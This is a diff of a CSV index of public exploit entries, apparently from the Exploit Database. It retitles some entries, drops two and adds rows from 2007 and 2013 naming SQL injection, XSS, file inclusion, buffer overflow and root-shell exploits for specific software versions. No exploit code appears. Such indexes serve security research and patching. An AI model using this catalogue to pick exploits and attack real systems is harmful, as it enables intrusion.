Put",linux,dos,0 28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0 @@ -25541,7 +25539,7 @@ id,file,description,date,author,platform,type,port 28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 Index.PHP Cross-Site Scripting Vulnerability",2006-09-11,"HACKERS PAL",php,webapps,0 28510,platforms/php/webapps/28510.txt,"PHProg 1.0 index.php album Parameter XSS",2006-09-11,cdg393,php,webapps,0 28511,platforms/php/webapps/28511.txt,"PHProg 1.0 index.php lang Parameter Traversal Arbitrary File Access",2006-09-11,cdg393,php,webapps,0 -28512,platforms/windows/remote/28512.txt,"Paul Smith Computer Services VCAP Calendar Server 1.9 Directory Traversal Vulnerability",2009-09-12,"securma massine",windows,remote,0 +28512,platforms/windows/remote/28512.txt,"paul smith computer services vcap calendar server 1.9 - Directory Traversal vulnerability",2009-09-12,"securma massine",windows,remote,0 28513,platforms/windows/dos/28513.txt,"Paul Smith Computer Services VCAP Calendar Server 1.9 Remote Denial of Service Vulnerability",2006-09-12,"securma massine",windows,dos,0 28514,platforms/cgi/webapps/28514.txt,"SQL-Ledger 2.6.x/LedgerSMB 1.0 Terminal Parameter Directory Traversal Vulnerability",2006-09-12,"Chris Murtagh",cgi,webapps,0 28515,platforms/php/webapps/28515.txt,"IDevSpot iSupport 1.8 rightbar.php suser Parameter XSS",2006-09-12,s3rv3r_hack3r,php,webapps,0 @@ -25589,7 +25587,7 @@ id,file,description,date,author,platform,type,port 28560,platforms/php/webapps/28560.txt,"Piwigo 2.5.2 Cross Site Scripting",2013-09-26,Arsan,php,webapps,0 28561,platforms/multiple/dos/28561.pl,"Blast XPlayer Local Buffer Overflow PoC",2013-09-26,flux77,multiple,dos,0 28562,platforms/hardware/webapps/28562.txt,"Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability",2013-09-26,"Hubert Gradek",hardware,webapps,0 -28563,platforms/multiple/webapps/28563.txt,"Posnic Stock Management System 1.02 Multiple Vulnerabilities",2013-09-26,"Sarahma Security",multiple,webapps,0 +28563,platforms/multiple/webapps/28563.txt,"posnic stock management system 1.02 - Multiple Vulnerabilities",2013-09-26,"Sarahma Security",multiple,webapps,0 28564,platforms/php/webapps/28564.txt,"ArticleSetup Multiple Vulnerabilities",2013-09-26,DevilScreaM,php,webapps,0 28565,platforms/php/webapps/28565.txt,"PHP Event Calendar 1.4/1.5 Index.PHP Multiple Cross Site Scripting Vulnerabilities",2006-09-13,"NR Nandini",php,webapps,0 28566,platforms/asp/webapps/28566.txt,"Snitz Forums 2000 Forum.ASP Cross-Site Scripting Vulnerability",2006-09-13,ajann,asp,webapps,0 @@ -25672,7 +25670,7 @@ id,file,description,date,author,platform,type,port 28643,platforms/osx/remote/28643.txt,"Apple Mac OS X 10.x AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",osx,remote,0 28644,platforms/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 Information Disclosure Vulnerability",2006-09-22,"Patrick Webster",php,webapps,0 28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 Vendors.PHP Directory Traversal Vulnerability",2006-09-22,"James Bercegay",php,webapps,0 -28646,platforms/php/webapps/28646.txt,"MySource 2.14.8/2.16 Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0 +28646,platforms/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0 28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 Filemanager.PHP Directory Traversal Vulnerability",2006-09-22,GuanYu,php,webapps,0 28648,platforms/freebsd/dos/28648.c,"FreeBSD 5.x I386_Set_LDT() Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos,0 28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0 @@ -25796,7 +25794,7 @@ id,file,description,date,author,platform,type,port 28775,platforms/linux/dos/28775.pl,"ZABBIX 1.1.2 Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0 28776,platforms/php/webapps/28776.txt,"EXPBlog 0.3.5 Multiple Cross-Site Scripting Vulnerabilities",2006-10-09,Tamriel,php,webapps,0 28777,platforms/php/webapps/28777.txt,"Hastymail 1.x IMAP SMTP Command Injection Vulnerability",2006-10-10,"Vicente Aguilera Diaz",php,webapps,0 -28778,platforms/php/webapps/28778.txt,"IronWebMail <= 6.1.1 Directory Traversal Information Disclosure Vulnerability",2006-10-16,"Derek Callaway",php,webapps,0 +28778,platforms/php/webapps/28778.txt,"ironwebmail <= 6.1.1 - Directory Traversal information disclosure vulnerability",2006-10-16,"Derek Callaway",php,webapps,0 28779,platforms/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 Getimg.PHP Remote File Include Vulnerability",2006-10-10,DarkFig,php,webapps,0 28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 Grid3.lib.PHP Remote File Include Vulnerabilities",2006-10-10,k1tk4t,php,webapps,0 28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 GoogleSearch.PHP Remote File Include Vulnerability",2006-10-10,k1tk4t,php,webapps,0 @@ -26035,7 +26033,7 @@ id,file,description,date,author,platform,type,port 29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 login_up.php3 XSS",2006-11-14,"David Vieira-Kurz",php,webapps,0 29019,platforms/php/webapps/29019.txt,"Zikula CMS 1.3.5 - Multiple Vulnerabilities",2013-10-17,Vulnerability-Lab,php,webapps,0 29020,platforms/php/webapps/29020.txt,"Quick Paypal Payments 3.0 - Presistant XSS (0day)",2013-10-17,Zy0d0x,php,webapps,80 -29021,platforms/php/webapps/29021.txt,"Wordpress WP Realty Plugin - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80 +29021,platforms/php/webapps/29021.txt,"Wordpress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80 29023,platforms/php/webapps/29023.txt,"Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection Exploit.",2013-10-17,"Easy Laster",php,webapps,0 29024,platforms/asp/webapps/29024.txt,"Inventory Manager Multiple Input Validation Vulnerabilities",2006-11-14,"Laurent Gaffie",asp,webapps,0 29025,platforms/asp/webapps/29025.txt,"Evolve Merchant Viewcart.ASP SQL Injection Vulnerability",2006-11-14,"Laurent Gaffie",asp,webapps,0 @@ -26267,7 +26265,7 @@ id,file,description,date,author,platform,type,port 29274,platforms/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability",2013-10-29,"Marcela Benetrix",php,webapps,80 29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 SurgeFTPMGR.CGI Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 ProductDetails.ASP SQL Injection Vulnerability",2006-12-11,ajann,asp,webapps,0 -29277,platforms/windows/remote/29277.txt,"Winamp Web Interface 7.5.13 Multiple Remote Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 +29277,platforms/windows/remote/29277.txt,"winamp web interface 7.5.13 Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 29278,platforms/php/webapps/29278.pl,"Work System ECommerce 3.0.3/3.0.4 Forum.PHP Remote File Include Vulnerability",2006-12-13,the_Edit0r,php,webapps,0 29279,platforms/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent XSS",2013-10-29,Vulnerability-Lab,php,webapps,0 29280,platforms/php/webapps/29280.txt,"GTX CMS 2013 Optima - SQL Injection",2013-10-29,Vulnerability-Lab,php,webapps,0 @@ -26469,7 +26467,7 @@ id,file,description,date,author,platform,type,port 29487,platforms/php/webapps/29487.txt,"Indexu 5.0/5.3 new.php multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29488,platforms/php/webapps/29488.txt,"Indexu 5.0/5.3 mailing_list.php Multiple Variables XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 login.php error_msg Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 -29490,platforms/windows/remote/29490.txt,"AVM Fritz!DSL IGD Control Service 2.2.29 Directory Traversal Information Disclosure Vulnerability",2007-01-17,DPR,windows,remote,0 +29490,platforms/windows/remote/29490.txt,"avm fritz!dsl igd control service 2.2.29 - Directory Traversal information disclosure vulnerability",2007-01-17,DPR,windows,remote,0 29491,platforms/php/webapps/29491.txt,"myBloggie 2.1.5 index.php PATH_INFO Parameter XSS",2007-01-17,CorryL,php,webapps,0 29492,platforms/php/webapps/29492.txt,"myBloggie 2.1.5 login.php PATH_INFO Parameter XSS",2007-01-17,CorryL,php,webapps,0 29495,platforms/php/webapps/29495.txt,"Sabros.US 1.7 Index.PHP Cross-Site Scripting Vulnerability",2007-01-18,CorryL,php,webapps,0 @@ -26680,7 +26678,7 @@ id,file,description,date,author,platform,type,port 29714,platforms/linux/local/29714.txt,"Linux Kernel 2.6.17 - Sys_Tee Local Privilege Escalation Vulnerability",2007-03-05,"Michael Kerrisk",linux,local,0 29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 Client Side Input Validation Vulnerability",2007-03-05,"Stefan Friedli",php,webapps,0 29716,platforms/linux/dos/29716.txt,"Silc Server 1.0.2 New Channel Remote Denial Of Service Vulnerability",2007-03-06,"Frank Benkstein",linux,dos,0 -29717,platforms/linux/dos/29717.txt,"Radscan Conquest 8.2 Multiple Remote Vulnerabilities",2007-03-07,"Luigi Auriemma",linux,dos,0 +29717,platforms/linux/dos/29717.txt,"radscan conquest 8.2 Multiple Vulnerabilities",2007-03-07,"Luigi Auriemma",linux,dos,0 29720,platforms/linux/dos/29720.txt,"Mozilla Firefox 2.0.0.2 Document.Cookie Path Argument Denial of Service Vulnerability",2007-03-08,"Nicolas DEROUET",linux,dos,0 29721,platforms/windows/dos/29721.pl,"Fish Multiple Remote Buffer Overflow Vulnerabilities",2007-03-08,"ilja van sprundel",windows,dos,0 29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 CreateURL.PHP Remote File Include Vulnerability",2007-03-09,"Hasadya Raed",php,webapps,0 @@ -26852,7 +26850,7 @@ id,file,description,date,author,platform,type,port 29895,platforms/php/webapps/29895.txt,"phpMyAdmin <= 2.9.1 Multiple Cross-Site Scripting Vulnerabilities",2007-04-24,sp3x@securityreason.com,php,webapps,0 29896,platforms/windows/dos/29896.c,"Cdelia Software ImageProcessing Malformed BMP File Denial of Service Vulnerability",2007-04-24,Dr.Ninux,windows,dos,0 29897,platforms/windows/remote/29897.txt,"Progress 3.1 Webspeed _CPYFile.P Unauthorized Access Vulnerability",2007-04-24,suresync,windows,remote,0 -29898,platforms/php/webapps/29898.txt,"Plesk <= 8.1.1 Login.PHP3 Directory Traversal Vulnerability",2007-04-25,Anonymous,php,webapps,0 +29898,platforms/php/webapps/29898.txt,"plesk <= 8.1.1 login.php3 - Directory Traversal vulnerability",2007-04-25,Anonymous,php,webapps,0 29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 Include.PHP Remote File Include Vulnerability",2007-04-25,"Ali and Saeid",php,webapps,0 29900,platforms/multiple/dos/29900.txt,"Asterisk 1.4 SIP T.38 SDP Parsing Remote Stack Buffer Overflow Vulnerabilities (1)",2007-03-21,"Barrie Dempster",multiple,dos,0 29901,platforms/multiple/dos/29901.txt,"Asterisk 1.4 SIP T.38 SDP Parsing Remote Stack Buffer Overflow Vulnerabilities (2)",2007-03-21,"Barrie Dempster",multiple,dos,0 @@ -26959,7 +26957,7 @@ id,file,description,date,author,platform,type,port 30007,platforms/windows/local/30007.txt,"Notepad++ Plugin Notepad# 1.5 - Local Exploit",2013-12-03,"Junwen Sun",windows,local,0 30008,platforms/java/remote/30008.rb,"Cisco Prime Data Center Network Manager Arbitrary File Upload",2013-12-03,metasploit,java,remote,0 30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA wserver.exe - Remote Code Execution",2013-12-03,metasploit,windows,remote,12221 -30010,platforms/php/remote/30010.rb,"Kimai v0.9.2 'db_restore.php' SQL Injection",2013-12-03,metasploit,php,remote,80 +30010,platforms/php/remote/30010.rb,"Kimai 0.9.2 - 'db_restore.php' SQL Injection",2013-12-03,metasploit,php,remote,80 30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,metasploit,windows,remote,0 30012,platforms/php/webapps/30012.txt,"Chamilo LMS 1.9.6 (profile.php, password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php, language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 @@ -26988,8 +26986,8 @@ id,file,description,date,author,platform,type,port 30038,platforms/windows/remote/30038.txt,"Caucho Resin 3.1 \web-inf Traversal Arbitrary File Access",2007-05-15,"Derek Abdine",windows,remote,0 30039,platforms/multiple/local/30039.txt,"Multiple Personal Firewall Products - Local Protection Mechanism Bypass Vulnerability",2007-05-15,"Matousec Transparent security",multiple,local,0 30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 Email FormMail.PHP Input Validation Vulnerability",2007-05-15,"Jesper Jurcenoks",php,webapps,0 -30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 view/search/ path Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 -30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 view/supplynews/ Multiple Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 +30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - view/search/ path Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 +30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Embedded ICC Profile Image Parser Overflow",2007-05-16,"Chris Evans",linux,remote,0 30044,platforms/linux/dos/30044.txt,"Sun Java JDK 1.x - BMP Parsing Remote Privilege Escalation",2007-05-16,"Chris Evans",linux,dos,0 30045,platforms/windows/remote/30045.html,"PrecisionID Barcode PrecisionID_Barcode.DLL ActiveX 1.9 Control Arbitrary File Overwrite Vulnerability",2007-05-16,shinnai,windows,remote,0 @@ -27003,15 +27001,13 @@ id,file,description,date,author,platform,type,port 30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 30054,platforms/jsp/webapps/30054.txt,"Sonicwall GMS 7.x - Filter Bypass & Persistent Vulnerability (0Day)",2013-12-05,Vulnerability-Lab,jsp,webapps,0 30055,platforms/hardware/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,hardware,webapps,0 -30056,platforms/hardware/webapps/30056.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,hardware,webapps,0 -30057,platforms/php/webapps/30057.txt,"openSIS <= 5.2 (ajax.php) - PHP Code Injection Vulnerability",2013-12-05,"Egidio Romano",php,webapps,0 30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module <= 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell Exploit",2013-12-06,0_o,hardware,webapps,0 30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote and Local File Disclosure Vulnerability",2013-12-06,"aceeeeeeeer .",php,webapps,0 30064,platforms/php/webapps/30064.txt,"HLstats 1.35 HLStats.PHP Multiple Cross Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 30065,platforms/php/webapps/30065.html,"GaliX 2.0 Index.PHP Multiple Cross Site Scripting Vulnerabilities",2007-05-21,"John Martinelli",php,webapps,0 30066,platforms/php/webapps/30066.txt,"Jetbox CMS 2.1 Multiple SQL Injection Vulnerabilities",2007-05-21,"Jesper Jurcenoks",php,webapps,0 -30067,platforms/windows/remote/30067.txt,"rdiffWeb 0.3.5 Directory Traversal Vulnerability",2007-05-22,"Jesus Roncero",windows,remote,0 +30067,platforms/windows/remote/30067.txt,"rdiffweb 0.3.5 - Directory Traversal vulnerability",2007-05-22,"Jesus Roncero",windows,remote,0 30068,platforms/php/webapps/30068.txt,"Jetbox CMS 2.1 Login Variable Cross Site Scripting Vulnerability",2007-05-22,"Jesper Jurcenoks",php,webapps,0 30069,platforms/windows/remote/30069.html,"Dart ZipLite Compression 1.8.5.3 DartZipLite.DLL ActiveX Control Buffer Overflow Vulnerability",2007-05-22,shinnai,windows,remote,0 30070,platforms/php/webapps/30070.html,"ClonusWiki 0.5 Index.PHP HTML Injection Vulnerability",2007-05-22,"John Martinelli",php,webapps,0 @@ -27029,7 +27025,7 @@ id,file,description,date,author,platform,type,port 30082,platforms/php/webapps/30082.txt,"GNUTurk Mods.PHP Cross Site Scripting Vulnerability",2007-05-25,vagrant,php,webapps,0 30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 (mod_notification) Stored Cross-Site Scripting Vulnerability",2013-12-06,LiquidWorm,php,webapps,0 30084,platforms/php/webapps/30084.php,"Wordpress page-flip-image-gallery plugins Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 -30085,platforms/linux/webapps/30085.txt,"Zimbra 0day exploit / Privilegie escalation via LFI",2013-12-06,rubina119,linux,webapps,0 +30085,platforms/linux/webapps/30085.txt,"Zimbra - 0day exploit / Privilegie escalation via LFI",2013-12-06,rubina119,linux,webapps,0 30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 Index.PHP Cross Site Scripting Vulnerability",2007-05-25,newbinaryfile,php,webapps,0 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 Multiple Cross Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0 30088,platforms/php/webapps/30088.txt,"Pligg 9.5 Reset Forgotten Password Security Bypass Vulnerability",2007-05-25,"242th section",php,webapps,0 @@ -27049,3 +27045,103 @@ id,file,description,date,author,platform,type,port 30102,platforms/php/webapps/30102.php,"Pheap 2.0 Config.PHP Pheap_Login Authentication Bypass Vulnerability",2007-05-30,Silentz,php,webapps,0 30103,platforms/php/webapps/30103.txt,"Particle Blogger <= 1.2.1 Archives.PHP SQL Injection Vulnerability",2007-03-16,Serapis.net,php,webapps,0 30104,platforms/windows/remote/30104.nasl,"F-Secure Policy Manager 7.00 FSMSH.DLL Remote Denial of Service Vulnerability",2007-05-30,"David Maciejak",windows,remote,0 +30105,platforms/php/webapps/30105.txt,"Wordpress Download Manager Free & Pro 2.5.8 - Persistent Cross Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps,0 +30107,platforms/php/webapps/30107.txt,"Ovidentia 7.9.6 - Multiple Vulnerabilities",2013-12-08,sajith,php,webapps,0 +30108,platforms/php/webapps/30108.txt,"Wordpress Templatic Themes - CSRF File Upload Vulnerability [Monetize Uploader]",2013-12-08,"Jje Incovers",php,webapps,0 +30109,platforms/php/webapps/30109.txt,"Particle Gallery 1.0 Search.PHP Cross-Site Scripting Vulnerability",2007-05-30,Serapis.net,php,webapps,0 +30110,platforms/linux/dos/30110.c,"Bochs 2.3 Buffer Overflow and Denial Of Service Vulnerabilities",2007-05-31,"Tavis Ormandy",linux,dos,0 +30111,platforms/php/webapps/30111.txt,"MyBloggie 2.1.x Index.PHP Multiple SQL Injection Vulnerabilities",2007-05-31,ls@calima.serapis.net,php,webapps,0 +30112,platforms/php/webapps/30112.txt,"PHP JackKnife 2.21 (PHPJK) G_Display.php iCategoryUnq Parameter SQL Injection",2007-05-31,"Laurent Gaffie",php,webapps,0 +30113,platforms/php/webapps/30113.txt,"PHP JackKnife 2.21 (PHPJK) Search/DisplayResults.php iSearchID Parameter SQL Injection",2007-05-31,"Laurent Gaffie",php,webapps,0 +30114,platforms/php/webapps/30114.txt,"PHP JackKnife 2.21 (PHPJK) UserArea/Authenticate.php sUName Parameter XSS",2007-05-31,"Laurent Gaffie",php,webapps,0 +30115,platforms/php/webapps/30115.txt,"PHP JackKnife 2.21 (PHPJK) UserArea/NewAccounts/index.php sAccountUnq Parameter XSS",2007-05-31,"Laurent Gaffie",php,webapps,0 +30116,platforms/php/webapps/30116.txt,"PHP JackKnife 2.21 (PHPJK) G_Display.php Multiple Parameter XSS",2007-05-31,"Laurent Gaffie",php,webapps,0 +30117,platforms/php/remote/30117.php,"PHP <= 5.1.6 Chunk_Split() Function Integer Overflow Vulnerability",2007-05-31,"Gerhard Wagner",php,remote,0 +30118,platforms/php/webapps/30118.txt,"Prototype of an PHP application 0.1 gestion/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30119,platforms/php/webapps/30119.txt,"Prototype of an PHP application 0.1 ident/identification.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30120,platforms/php/webapps/30120.txt,"Prototype of an PHP application 0.1 ident/disconnect.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30121,platforms/php/webapps/30121.txt,"Prototype of an PHP application 0.1 ident/loginliste.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30122,platforms/php/webapps/30122.txt,"Prototype of an PHP application 0.1 ident/loginmodif.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30123,platforms/php/webapps/30123.txt,"Prototype of an PHP application 0.1 ident/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30124,platforms/php/webapps/30124.txt,"Prototype of an PHP application 0.1 ident/ident.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30125,platforms/php/webapps/30125.txt,"Prototype of an PHP application 0.1 menu/menuprincipal.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30126,platforms/php/webapps/30126.txt,"Prototype of an PHP application 0.1 param/param.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30127,platforms/php/webapps/30127.txt,"Prototype of an PHP application 0.1 plugins/phpgacl/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30128,platforms/php/webapps/30128.txt,"Prototype of an PHP application 0.1 index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30129,platforms/php/webapps/30129.txt,"Prototype of an PHP application 0.1 common.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30130,platforms/php/remote/30130.txt,"PHP <= 5.2.3 EXT/Session HTTP Response Header Injection Vulnerability",2007-06-04,"Stefan Esser",php,remote,0 +30131,platforms/php/webapps/30131.txt,"Buttercup WFM Title Parameter Cross-Site Scripting Vulnerability",2007-06-01,"John Martinelli",php,webapps,0 +30132,platforms/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) cross-site script vulnerability",2007-06-01,"Glafkos Charalambous ",php,webapps,0 +30133,platforms/php/webapps/30133.txt,"PHPLive! 3.2.2 chat.php sid Parameter XSS",2007-06-01,ReZEN,php,webapps,0 +30134,platforms/php/webapps/30134.txt,"PHPLive! 3.2.2 help.php Multiple Parameter XSS",2007-06-01,ReZEN,php,webapps,0 +30135,platforms/php/webapps/30135.txt,"PHPLive! 3.2.2 admin/header.php admin[name] Parameter XSS",2007-06-01,ReZEN,php,webapps,0 +30136,platforms/php/webapps/30136.txt,"PHPLive! 3.2.2 super/info.php BASE_URL Variable Parameter XSS",2007-06-01,ReZEN,php,webapps,0 +30137,platforms/php/webapps/30137.txt,"PHPLive! 3.2.2 setup/footer.php Multiple Parameter XSS",2007-06-01,ReZEN,php,webapps,0 +30138,platforms/php/webapps/30138.txt,"Linker 2.0.4 Index.PHP Cross-Site Scripting Vulnerability",2007-06-02,vagrant,php,webapps,0 +30139,platforms/multiple/dos/30139.c,"Agnitum Outpost Firewall 4.0 Outpost_IPC_HDR Local Denial of Service Vulnerability",2007-06-04,"Matousec Transparent security",multiple,dos,0 +30140,platforms/php/webapps/30140.txt,"Okyanusmedya Index.PHP Cross-Site Scripting Vulnerability",2007-06-04,vagrant,php,webapps,0 +30141,platforms/asp/webapps/30141.txt,"Hunkaray Okul Portaly 1.1 Haberoku.ASP SQL Injection Vulnerability",2007-06-04,ertuqrul,asp,webapps,0 +30142,platforms/linux/remote/30142.txt,"GDB 6.6 - Process_Coff_Symbol UPX File Buffer Overflow Vulnerability",2007-06-04,"KaiJern Lau",linux,remote,0 +30143,platforms/php/webapps/30143.txt,"WebStudio CMS Index.PHP Cross-Site Scripting Vulnerability",2007-06-04,"Glafkos Charalambous ",php,webapps,0 +30144,platforms/windows/remote/30144.html,"eSellerate SDK 3.6.5 eSellerateControl365.DLL ActiveX Control Buffer Overflow Vulnerability",2007-06-04,shinnai,windows,remote,0 +30145,platforms/hardware/webapps/30145.txt,"Feetan Inc WireShare v1.9.1 iOS - Persistent Vulnerability",2013-12-08,Vulnerability-Lab,hardware,webapps,0 +30146,platforms/hardware/webapps/30146.txt,"Print n Share v5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,hardware,webapps,0 +30152,platforms/php/webapps/30152.txt,"My Databook diary.php delete Parameter SQL Injection",2007-06-04,Serapis.net,php,webapps,0 +30153,platforms/php/webapps/30153.txt,"My Databook diary.php year Parameter XSS",2007-06-04,Serapis.net,php,webapps,0 +30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - SEH Buffer Overflow (.reg)",2013-12-09,"Mike Czumak",windows,local,0 +30155,platforms/php/webapps/30155.txt,"Wordpress TDO-Mini-Forms Plugin - Arbitrary File Upload Vulnerability",2013-12-09,"terminator ashiyane",php,webapps,0 +30156,platforms/cgi/webapps/30156.txt,"CGILua <= 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0 +30157,platforms/php/webapps/30157.txt,"Joomla JD-Wiki 1.0.2 dwpage.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 +30158,platforms/php/webapps/30158.txt,"Joomla JD-Wiki 1.0.2 wantedpages.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 +30159,platforms/asp/webapps/30159.txt,"ASP Folder Gallery Download_Script.ASP Arbitrary File Download Vulnerability",2007-06-06,freeprotect.net,asp,webapps,0 +30160,platforms/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ ICO File Remote Denial of Service Vulnerability",2007-06-06,"Dennis Rand",windows,dos,0 +30161,platforms/php/webapps/30161.txt,"Atom PhotoBlog 1.0.1/1.0.9AtomPhotoBlog.PHP Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 +30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 Multiple Cross Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0 +30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0 +30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 Tk Parameter Cross Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0 +30165,platforms/asp/webapps/30165.txt,"Ibrahim Ă?AKICI Okul Portal 2.0 Haber_Oku.ASP SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0 +30166,platforms/php/webapps/30166.txt,"WordPress 2.2 Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0 +30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability",2007-06-08,nnposter,hardware,dos,0 +30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0 +30169,platforms/windows/remote/30169.txt,"WindowsPT 1.2 User ID Key Spoofing Vulnerability",2007-06-11,nnposter,windows,remote,0 +30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 +30171,platforms/php/webapps/30171.txt,"JFFNMS 0.8.3 auth.php Multiple Parameter SQL Injection",2007-06-11,"Tim Brown",php,webapps,0 +30172,platforms/php/webapps/30172.txt,"JFFNMS 0.8.3 auth.php user Parameter XSS",2007-06-11,"Tim Brown",php,webapps,0 +30173,platforms/php/webapps/30173.txt,"JFFNMS 0.8.3 admin/adm/test.php PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 +30174,platforms/php/webapps/30174.txt,"JFFNMS 0.8.3 admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 +30175,platforms/php/webapps/30175.txt,"BBpress 0.8.1 BB-Login.PHP Cross Site Scripting Vulnerability",2007-06-11,"Ory Segal",php,webapps,0 +30176,platforms/windows/remote/30176.html,"Apple Safari 3 for Windows Protocol Handler Command Injection Vulnerability",2007-06-12,"Thor 